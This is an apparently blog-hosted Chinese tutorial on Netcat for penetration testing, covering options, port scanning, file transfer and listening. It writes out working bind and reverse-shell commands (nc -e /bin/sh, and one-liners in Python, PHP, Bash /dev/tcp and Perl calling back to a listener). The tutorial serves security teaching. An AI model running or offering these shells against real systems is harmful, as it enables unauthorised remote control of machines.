python连接netcat监听的端口_netcat使用

最新推荐文章于 2024-06-08 23:19:53 发布
最新推荐文章于 2024-06-08 23:19:53 发布
阅读量775 收藏 1
点赞数
文章标签: python连接netcat监听的端口

前言

最近在做渗透测试的时候遇到了端口监听和shell的反弹问题,在这个过程中自己对Netcat这一款神器有了新的认识,现将一些Netcat的用法做一个小总结,希望对各位有帮助!

Netcat简介

Netcat是一款非常出名的网络工具,简称“NC”,有渗透测试中的“瑞士军刀”之称。它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。总之功能强大,可以用一句较为风趣的话来描述NC的强大——“你的想象力是局限NC的瓶颈”。

Netcat选项参数说明

功能说明:端口扫描、端口监听、远程文件传输、远程shell等等;

语  法:nc [-hlnruz][-g][-G][-i][-o][-p][-s][-v...][-w][主机名称][通信端口...]

参  数:

-g 设置路由器跃程通信网关,最多可设置8个;

-G 设置来源路由指向器,其数值为4的倍数;

-h 在线帮助;

-i 设置时间间隔,以便传送信息及扫描通信端口;

-l 使用监听模式,管控传入的资料;

-n 直接使用IP地址,而不通过域名服务器;

-o 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;

-p 设置本地主机使用的通信端口;

-r 乱数指定本地与远端主机的通信端口;

-s 设置本地主机送出数据包的IP地址;

-u 使用UDP传输协议;

-v 显示指令执行过程;

-w 设置等待连线的时间;

-z 使用0输入/输出模式,只在扫描通信端口时使用。

Netcat简易使用

连接到远程主机

命令:nc  -nvv Targert_IP  Targert_Port

监听本地主机

命令:nc -l  -p Local_Port

端口扫描

扫描指定主机的单一端口是否开放

格式:nc -v target_IP target_Port

扫描指定主机的某个端口段的端口开放信息

格式:nc -v  -z Target_IP Target_Port_Start - Target_Port_End

扫描指定主机的某个UDP端口段,并且返回端口信息

格式:nc -v   -z  -u  Target_IP  Target_Port_Start - Target_Port_End

扫描指定主机的端口段信息,并且设置超时时间为3秒

格式:nc  -vv(-v) -z  -w  time Target_IP   Target_Port_Start-Targert_Port_End

端口监听

监听本地端口

格式:nc -l  -p  local_Port

注:先设置监听(不能出现端口冲突),之后如果有外来访问则输出该详细信息到命令行

监听本地端口,并且将监听到的信息保存到指定的文件中

格式:nc -l -p local_Port > target_File

连接远程系统

格式:nc Target_IP  Target_Port

之后可以运行HTTP请求

FTP匿名探测

格式:nc Targert_IP  21

文件传输

传输端:

格式:nc Targert_IP  Targert_Port  <  Targert_File

接收端:

格式:nc   -l  Local_Port  >  Targert_File

简易聊天

本地主机

命令:nc   -l   8888

远程主机

命令:nc Targert_IP    Targert_Port

蜜罐

作为蜜罐使用1:

命令:nc -L -p  Port

注:使用“-L”参数可以不停的监听某一个端口,知道Ctrl+C为止

作为蜜罐使用2:

命令:nc -L -p  Port >log.txt

注:使用“-L”参数可以不停的监听某一个端口,知道Ctrl+C为止,同时把结果输出到log.txt文件中,如果把“>”改为“>>”即追加到文件之后。

这一个命令参数“-L”在Windows中有,现在的Linux中是没有这个选项的,但是自己可以去找找,这里只是想到了之前的这个使用,所以提出来简单介绍一下!

获取shell

简述:获取shell分为两种,一种是正向shell,一种是方向shell。如果客户端连接服务器端,想要获取服务器端的shell,那么称为正向shell,如果是客户端连接服务器,服务器端想要获取客户端的shell,那么称为反向shell

正向shell

本地主机:

命令:nc   Targert_IP  Targert_Port

目标主机:

命令:nc  -lvp  Targert_Port   -e  /bin/sh

反向shell

本地主机:

命令: nc -lvp  Target_Port

目标主机:

命令: nc  Targert_IP Targert_Port  -e /bin/sh

特殊情况——目标主机上没有Netcat,如何获取反向shell

在一般情况下,目标主机上一般都是不会有Netcat的,此时就需要使用其他替代的方法来实现反向链接达到攻击主机的目的,下面简单的介绍几种反向shell的设置。

python反向shell

目标主机端执行语句:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.144",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

本地主机

目标主机

PHP反向shell

目标主机端执行语句:

php -r '$sock=fsockopen("192.168.11.144",2222);exec("/bin/sh -i &3 2>&3");'

本地主机:

目标主机:

Bash反向shell

目标主机端执行语句:

bash -i>&/dev/tcp/192.168.11.144/2222 0>&1

本地主机:

目标主机:

Perl反向shell

目标主机端执行语句:

perl -e 'use Socket;$i="192.168.11.144";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

本地主机

目标主机

注:书写的时候一定要注意这里单引号、双引号是英文格式的,不然会报错误!

weixin_39754915
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅谈Python黑帽子取代netcat
12-23
按照各位大佬的博客来,端口连接的命令始终连接不上。 后来问了同学,在开了监听之后: 使用书上的代码连接不能成功,连接的命令改成:nc www.baidu.com 80(同理 监听本地就改成 nc 127.0.0.1 8888) 二、上传...
python写一个NC(八)
路虽远,行将至。事虽难,做必达。
02-19 1694
基于TCP连接的远程控制木马 一、subprocess模块 subprocess模块允许我们启动一个新进程,并连接至它们的标准输入/输出/错误管道,从而获取返回值。 二、argparse模块 argparse是python用于解析命令行参数和选项的标准模块,作用相当于是解析命令行参数。 基本用法步骤 import argparse #导入模块 parse = argparse.ArgumentParser() #创建解析对象 parse.add...
C段扫描实验
weixin_46831054的博客
01-16 3178
通过使用Nmap、Masscan工具,对指定目标信息进行tance 一、Nmap探测 1.获得靶机IP地址,这里我用我的虚拟机IP 2.从kali终端上使用nmap进行信息探测,并保存为out.html 文件 命令: nmap -sn -PE -n 192.168.160.142/24 -oX out.html -sn 不扫描端口 -PE ICMP扫描 -n 不进行dns解析 查看扫描结果 tail out.html 二、Msscan探测 在kali上运行msscan需要对应环境 1.安装环
Linux网络命令:网络工具netcat详解
最新发布
weixin_70208651的博客
06-08 969
Netcat(也称为ncnetcat-openbsd)是一个非常强大和灵活的网络工具,它主要用于创建TCP或UDP网络连接Netcat可以作为一个简单的终端程序,也可以作为一个强大的网络诊断、监控和攻击工具。在我们测试工作中可以经常用到这个工具。可以通过EPEL仓库来安装和卸载,可以通过yum和DNF来安装;通过nc可以连接到网络主机的特定端口监听端口、传输文件等,可以用于各种网络活动,包括渗透测试。也可以用于各种网络任务,从诊断到安全测试。
python实现nc_python编写nc的思考
weixin_39651325的博客
12-05 706
0x00 前言发现自己学习python已经有半个月了,也开发了自己的一些渗透的小脚本,但觉得还是不够,我个人觉得工具和脚本还有框架是个本质上的区别。脚本的话,不会考虑到其他的一些因素,例如报错和交互性。要是有的话可能还要在工具里面修改到一些参数,然后才能进行使用。简单点来过脚本给我的概念就是编写出来能用就行。而工具具有的是一些交互性让对方输入自己想要的命令或者说参数,然后执行不需要频繁改代码再使用...
python实现fsan自动化用扫描c段的方式扫描b段
weixin_43183608的博客
05-12 2979
大批量c段扫描自动化
nc
diexian5592的博客
09-09 268
nc 用于设置路由器。执行本指令可设置路由器的相关参数。 nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...] -g<网关> 设置路由...
nc.rar_nc python
09-20
2. **Netcat (nc)**:Netcat是一个开源工具,可用于创建TCP和UDP连接监听端口,执行端口扫描,以及数据传输。在网络安全和渗透测试领域,Netcat常被用作基础工具。 3. **PythonNetcat的结合**:Python可以用来...
Foundations of Python Network Programming_networkprogramming_
10-02
- **网络工具**:如Wireshark抓包分析,netcat进行端口监听和测试。 - **Python测试工具**:使用unittest模块对网络应用进行单元测试。 8. **应用层协议**: - **FTP**:文件传输协议的实现,如使用ftplib模块。...
python网络编程(第3版)配套代码_python网络编程(第3版)配套代码_
10-02
- 创建socket对象:使用`socket.socket()`创建,然后通过`bind()`绑定IP和端口,`listen()`开始监听连接,`accept()`接收客户端连接。 - 数据传输:使用`recv()`接收数据,`sendall()`发送数据,确保数据完整传输...
Python学习笔记——socket通信相关资源文件
07-18
这些服务器通常会监听特定的端口,等待客户端的连接请求。一旦有客户端连接,服务器就可以接收数据并发送响应。 1. **创建Socket对象**:在Python中,使用`socket.socket()`函数创建一个socket对象,指定协议类型...
netcat端口监听
10-30
非常实用强大的端口监听工具~~并却有很多命令参数
Kali-NC(瑞士军刀)四种连接方法
boooooooooooooo的博客
11-16 6386
第一种: NC(反向)连接:受控端先启动好监听(最新版本Kali)→控制端主动连接(老版本Kali) nc -lvp 9999 //开启监听 nc 192.168.158.133 9999 -c /bin/bash //控制端主动连接 第二种: NC(正向)连接:受控端先启动好监听(老版本Kali)→控制端主动连接(最新版本Kali) nc -lvp 6666 -e /bin/bash //受控端开启监听 nc 192.168.158.131 6666 //...
图解用NetCat连接远程端口
不忘初心,方得始终
02-28 3344
Netcat使用手册 简介: 在网络工具中有“瑞士军刀”美誉的NetCat(以下简称nc),在我们用了N年了至今仍是爱不释手。因为它短小精悍(这个用在它身上很适合,现在有人已经将其修改成大约10K左右,而且功能不减少)。 参数格式 连接到某处: nc [-options] hostname port[s] [ports] … 监听端口等待连接nc
flume实战:netcat端口数据监听
lyw5200的博客
03-13 972
一:环境说明 jdk版本:jdk-8u171-linux-x64.tar.gz flume版本:apache-flume-1.7.0-bin.tar.gz 需要的小伙伴请自行下载解压并配置,这里不再阐述,若有问题,请评论或移步到公号留言 二:实战示例 1、编写配置文件 此处可先在flume安装目录下创建job文件夹,后续编辑的agent配置文件可放在该文件夹下,(文件夹及文件名自定义即可,保持一致) # 声明一个agent:a1,并分别指定其三大组件的名字 a1.sources = r1 a
Netcat使用教程
Kali与编程
03-26 1726
虽然它的使用方法相对简单,但是它也提供了许多高级功能,可以帮助渗透测试人员更好地进行网络操作。其中,“-w 3”表示设置超时值为3秒,“[server-ip]”指定服务器IP地址,“[port]”指定服务器端口号,“[file-name]”指定要下载的文件名,“[output-file-name]”指定输出文件名。其中,“[target-ip]”指定目标IP地址,“[port]”指定目标端口号。其中,“-l”表示监听模式,“[port]”指定要监听端口号。其中,“-u”表示使用UDP协议进行通信。
Netcat 基础
Kali与编程
02-17 849
在本文中,我们深入探讨了Netcat的基本命令,包括建立TCP/UDP连接、传输文件、端口扫描、监听端口和创建反向Shell。在本文中,我们讨论了如何安装Netcat,并提供了一些常见的用法,包括建立TCP/UDP连接、传输文件和端口扫描。在本文中,我们将深入探讨Netcat的基本命令,并提供一些实用示例,以帮助您更好地了解和使用这个强大的工具。在本文中,我们将深入探讨Netcat的选项和参数,以帮助您更好地了解和使用这个强大的工具。在本文中,我们将讨论如何安装Netcat,并提供一些常见的用法。
科普:Windows下Netcat使用手册
热门推荐
sdujava2011
07-20 4万+
本文转自https://www.91ri.org/7761.html,稍作修改,所有权力归原作者所有。 简介: 在网络工具中有“瑞士军刀”美誉的NetCat(以下简称nc),在我们用了N年了至今仍是爱不释手。因为它短小精悍(这个用在它身上很适合,现在有人已经将其修改成大约10K左右,而且功能不减少)。 参数格式 连接到某处: nc [-options] hostnam
python处理nc_python实现nc
weixin_39915078的博客
12-09 273
#!/usr/bin/python2import sysimport socketimport getoptimport threadimport subprocesslisten =Falsecommand =Falseupload =Falseexecute =""target ...
使用flume监听netcat端口
04-25
好的,你想了解关于使用flume监听netcat端口的内容。使用flume监听netcat端口,需要在flume配置文件中添加source和sink,其中source需要指定为exec,然后指定command为nc -lk 44444或者其他端口号。sink可以根据需求...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值